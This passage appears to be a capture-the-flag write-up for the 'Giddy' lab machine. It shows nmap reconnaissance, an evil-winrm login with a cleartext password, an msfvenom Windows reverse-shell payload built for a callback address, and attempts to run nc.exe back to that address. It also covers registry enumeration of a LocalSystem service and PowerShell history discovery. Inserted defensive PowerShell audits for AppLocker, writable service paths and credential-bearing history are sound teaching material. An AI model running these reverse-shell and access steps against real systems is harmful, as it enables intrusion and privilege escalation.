1. Reconnaissance
1.1. nmap
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 10.129.96.140 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 21:15 +04
Nmap scan report for 10.129.96.140
Host is up (0.19s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
| h2
|_ http/1.1
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2026-01-03T17:15:55+00:00; -7s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIDDY
| NetBIOS_Domain_Name: GIDDY
| NetBIOS_Computer_Name: GIDDY
| DNS_Domain_Name: Giddy
| DNS_Computer_Name: Giddy
| Product_Version: 10.0.14393
|_ System_Time: 2026-01-03T17:15:48+00:00
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2026-01-02T17:11:17
|_Not valid after: 2026-07-04T17:11:17
|_ssl-date: 2026-01-03T17:15:55+00:00; -7s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -6s, deviation: 0s, median: -7s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.04 seconds
I downloaded nc.exe and tried to run it from PowerShell, but execution was blocked.
PS C:\Users\Stacy\Documents>
nc.exe 10.10.14.143 443
The term 'nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (nc.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\Users\Stacy\Documents>
.\nc.exe 10.10.14.143 443
Program 'nc.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator.
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
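The "blocked by group policy" message comes from AppLocker. As an added example (not part of the original writeup), this is how an administrator would inspect the effective policy on the host and confirm how it treats executables dropped into a user profile. It assumes the AppLocker module is available and that `RuleCollectionType`, `EnforcementMode` and `Count` are exposed on each rule collection; the `Downloads` path is a constructed placeholder and `Test-AppLockerPolicy` is only given files that exist on disk.

```powershell
# Added example, not from the original writeup: audit the effective AppLocker
# policy that produced "This program is blocked by group policy".
# Assumes the AppLocker module is present (Windows Server / Enterprise SKUs).
Import-Module AppLocker

# The effective policy merges the local policy with every applied GPO.
$policy = Get-AppLockerPolicy -Effective

# Which rule collections exist and whether they enforce or only audit.
# (Property names RuleCollectionType / EnforcementMode / Count assumed.)
foreach ($rc in $policy.RuleCollections) {
    '{0,-10} mode={1,-14} rules={2}' -f $rc.RuleCollectionType, $rc.EnforcementMode, $rc.Count
}

# Paths to evaluate: the binary from the writeup plus a constructed placeholder
# in another user-writable location. Only existing files are passed on,
# because hash and publisher rules need the file contents to evaluate.
$candidates = @(
    'C:\Users\Stacy\Documents\nc.exe',
    "$env:USERPROFILE\Downloads\example.exe"   # constructed placeholder path
) | Where-Object { Test-Path -Path $_ -PathType Leaf }

# Evaluate each path as a member of Everyone would be evaluated.
# PolicyDecision is Allowed / Denied / DeniedByDefault; MatchingRule names the
# rule that produced the decision (empty when denied by default).
Test-AppLockerPolicy -PolicyObject $policy -Path $candidates -User 'Everyone' |
    Select-Object FilePath, PolicyDecision, MatchingRule
```

A `DeniedByDefault` decision with an `Enabled` executable collection is the configuration that produced the error above; an `AuditOnly` collection would have let nc.exe run and only logged it.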
But evil-winrm works, so there is no need to go to that trouble.
┌──(root㉿kali)-[/home/kali/labs/Giddy]
└─# evil-winrm -i 10.129.96.140 -u stacy -p xNnWo6272k7x
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents>
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy
*Evil-WinRM* PS C:\Users\Stacy\Documents> ls
Directory: C:\Users\Stacy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/4/2026 3:52 AM 59392 nc.exe
-a---- 6/17/2018 9:36 AM 6 unifivideo
┌──(root㉿kali)-[/home/kali/labs/Giddy]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.143 LPORT=443 -f exe -o rev443.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: rev443.exe
*Evil-WinRM* PS C:\Users\Stacy\Documents> cd HKLM:\system\currentcontrolset\services
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> ls
Hive: HKEY_LOCAL_MACHINE\system\currentcontrolset\services
Name Property
---- --------
.NET CLR Data
.NET CLR Networking
.NET CLR Networking 4.0.0.0
.NET Data Provider for Oracle
.NET Data Provider for SqlServer
.NET Memory Cache 4.0
.NETFramework
[...SNIP...]
UniFiVideoService Type : 16
Start : 2
ErrorControl : 1
ImagePath : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
DisplayName : Ubiquiti UniFi Video
DependOnService : {Tcpip, Afd}
ObjectName : LocalSystem
Description : Ubiquiti UniFi Video Service
[...SNIP...]
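The listing above shows how service definitions live under `HKLM:\SYSTEM\CurrentControlSet\Services`, with `ImagePath` naming the binary and `ObjectName` the account it runs as; UniFiVideoService runs as LocalSystem from `C:\ProgramData\unifi-video`. As an added example (not part of the original writeup), the script below walks that hive the same way and reports every Win32 service whose binary sits outside the Windows and Program Files trees, together with whether low-privileged groups hold write rights on the binary's directory. The trusted-root list and group names are assumptions chosen for this illustration.

```powershell
# Added example, not from the original writeup: audit service binaries from
# HKLM:\SYSTEM\CurrentControlSet\Services for locations ordinary users can write to.
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
    Where-Object { $_ -ne '\' }   # drop the x86 entry on 32-bit hosts where it is empty

# Any of these rights on the directory lets a user drop or replace files in it.
$writeMask  = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
$lowPrivIds = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

function Get-ServiceBinaryPath([string]$imagePath) {
    # "C:\x\y.exe" --args  ->  C:\x\y.exe
    # C:\x\avService.exe //RS//Name  ->  C:\x\avService.exe
    $p = [Environment]::ExpandEnvironmentVariables($imagePath.Trim())
    if ($p.StartsWith('"')) { return ($p -split '"')[1] }
    if ($p -match '^(.*?\.exe)') { return $Matches[1] }
    return $p
}

$report = Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object {
    $svcName = $_.PSChildName
    $svc = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    # Type 0x10 / 0x20 = Win32 own / shared process; skip kernel and filesystem drivers.
    if (-not $svc.ImagePath -or -not ($svc.Type -band 0x30)) { return }

    $exe = Get-ServiceBinaryPath $svc.ImagePath
    # Relative and \SystemRoot-style paths resolve under the Windows directory; skip them.
    if ($exe -notmatch '^[A-Za-z]:\\') { return }

    $trusted = $false
    foreach ($root in $trustedRoots) {
        if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $trusted = $true }
    }
    if ($trusted) { return }

    $dir = Split-Path -Path $exe -Parent
    $acl = Get-Acl -Path $dir -ErrorAction SilentlyContinue
    $weakAces = @()
    if ($acl) {
        $weakAces = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $lowPrivIds -contains $_.IdentityReference.Value -and
            ($_.FileSystemRights -band $writeMask)
        })
    }

    [pscustomobject]@{
        Service        = $svcName
        RunsAs         = $svc.ObjectName      # LocalSystem in the writeup
        Start          = $svc.Start           # 2 = automatic start
        Binary         = $exe
        LowPrivWriters = ($weakAces | ForEach-Object { $_.IdentityReference.Value } |
                          Sort-Object -Unique) -join ', '
    }
}

$report | Format-Table -AutoSize
```

A row whose `RunsAs` is LocalSystem and whose `LowPrivWriters` column is non-empty is the combination to fix first, either by moving the binary under Program Files or by removing the write ACE from the directory; the same check is worth repeating on the binary itself with `Get-Acl` on `Binary`.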
I confirmed that up to 4096 history entries are kept, and checked where the history file is stored.
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> (Get-PSReadLineOption).MaximumHistoryCount
4096
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> (Get-PSReadLineOption).HistorySavePath
C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt
In practice, history was not being written to ServerRemoteHost_history.txt, the file reported as the save path. Navigating to that directory and checking shows that a ConsoleHost_history.txt file exists there instead.
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> type C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt
Cannot find path 'C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt' because it does not exist.
At line:1 char:1
+ type C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSRe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Stacy\...ost_history.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> cd C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
*Evil-WinRM* PS C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline> ls
Directory: C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/17/2018 9:48 AM 207 ConsoleHost_history.txt
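The two file names differ because PSReadLine builds the default `HistorySavePath` from the host name (`$Host.Name`): an interactive console is `ConsoleHost`, while a WinRM session is `ServerRemoteHost`, so the remote session reports a path it has never written to. As an added example (not part of the original writeup), the script below reports the current session's history settings, then finds the PSReadLine history files of every local profile and counts lines that look like they carry credentials. The profile root and the keyword pattern are assumptions for this illustration.

```powershell
# Added example, not from the original writeup: inventory PSReadLine history
# files across local profiles and flag lines that may contain credentials.

# Where the current session would write, and whether it saves history at all.
$opt = Get-PSReadLineOption
'{0}: HistorySaveStyle={1} Path={2}' -f $Host.Name, $opt.HistorySaveStyle, $opt.HistorySavePath

# Constructed keyword list; extend it for the tools in use on the host.
$pattern = 'password|passwd|-p\s|secret|token|ConvertTo-SecureString|net user|cmdkey'

# Default PSReadLine location under each profile's roaming AppData (assumed layout).
$histDirs = Get-ChildItem -Path "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue |
    ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline' } |
    Where-Object { Test-Path -Path $_ }

$report = foreach ($dir in $histDirs) {
    Get-ChildItem -Path $dir -Filter '*_history.txt' -ErrorAction SilentlyContinue | ForEach-Object {
        $hits = @(Select-String -Path $_.FullName -Pattern $pattern)
        [pscustomobject]@{
            Profile    = ($_.FullName -split '\\')[2]   # C:\Users\<name>\... -> <name>
            File       = $_.Name                          # ConsoleHost_ vs ServerRemoteHost_
            Lines      = @(Get-Content -Path $_.FullName).Count
            LastWrite  = $_.LastWriteTime
            Suspicious = $hits.Count
        }
    }
}

$report | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Run it as an administrator so every profile is readable. A non-zero `Suspicious` count is a prompt to rotate whatever was typed and to clear the file; hosts that should not retain history at all can set `Set-PSReadLineOption -HistorySaveStyle SaveNothing` in the all-users profile.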